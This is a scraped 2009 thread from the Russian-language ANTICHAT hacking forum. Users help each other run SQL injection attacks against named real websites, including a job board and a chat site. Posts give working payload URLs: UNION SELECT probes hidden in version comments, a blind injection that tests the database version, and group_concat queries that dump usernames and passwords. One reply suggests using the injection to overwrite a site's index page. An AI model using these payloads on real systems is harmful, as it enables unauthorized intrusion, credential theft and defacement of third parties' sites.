ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

23.01.2009, 00:46
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Сообщение от AFoST
версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
Ясненько, спасибо. Значит дальше рыть бесполезно?
|
|
|

23.01.2009, 00:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Как работать с 3 веткой:
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
|
|
|

23.01.2009, 00:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Ну почему, блайнд sql фактически,
http://rabota.kz/candidates/vacancies.php?cat=-123+and+substring(@@version,1,1)=3
читай подпись, там есть
|
|
|

23.01.2009, 01:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от sabe
попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index
как? получилось?)
|
|
|

23.01.2009, 08:34
|
|
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме: 127764
Репутация:
-1
|
|
Сообщение от попугай
как? получилось?)
ребята подскажите кто-нить вот так выглядет сама сртpаничка
http://dwap.tj/chat/profile.php?id=1187&password=&ver=html
id= -1187&password=&ver=html
тут я ставлю минус между равно и 1187
и после как поставил минус выходит вот такая хринитень
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 5 in /var/www/localhost/htdocs/dwap.tj/chat/profile.php on line 8
вопрос с могу я что-нить тут сделать,и как тут составить правильный запрос.
Последний раз редактировалось or1; 23.01.2009 в 08:40..
|
|
|

23.01.2009, 12:24
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме: 349682
Репутация:
30
|
|
Всем привет!
Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
|
|
|

23.01.2009, 12:28
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
Разобрался. Длина возвращаемого значение GROUP_CONCAT ограничена переменной group_concat_max_len и обычно равна 1024. Поэтому и выбирается так мало данных...
Последний раз редактировалось groundhog; 23.01.2009 в 12:35..
|
|
|

23.01.2009, 12:32
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме: 109513
Репутация:
52
|
|
про group_concat
http://webi.ru/webi_articles/8_14_f.html
|
|
|

23.01.2009, 12:33
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Сообщение от Octave_Parango
Всем привет!
Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
попробуй
1) через limit 1,5 или 1,10
2) concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))
Последний раз редактировалось Gemini12; 23.01.2009 в 13:06..
|
|
|

23.01.2009, 12:43
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме: 349682
Репутация:
30
|
|
Gemini12, неа, не получается чиво-то (
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|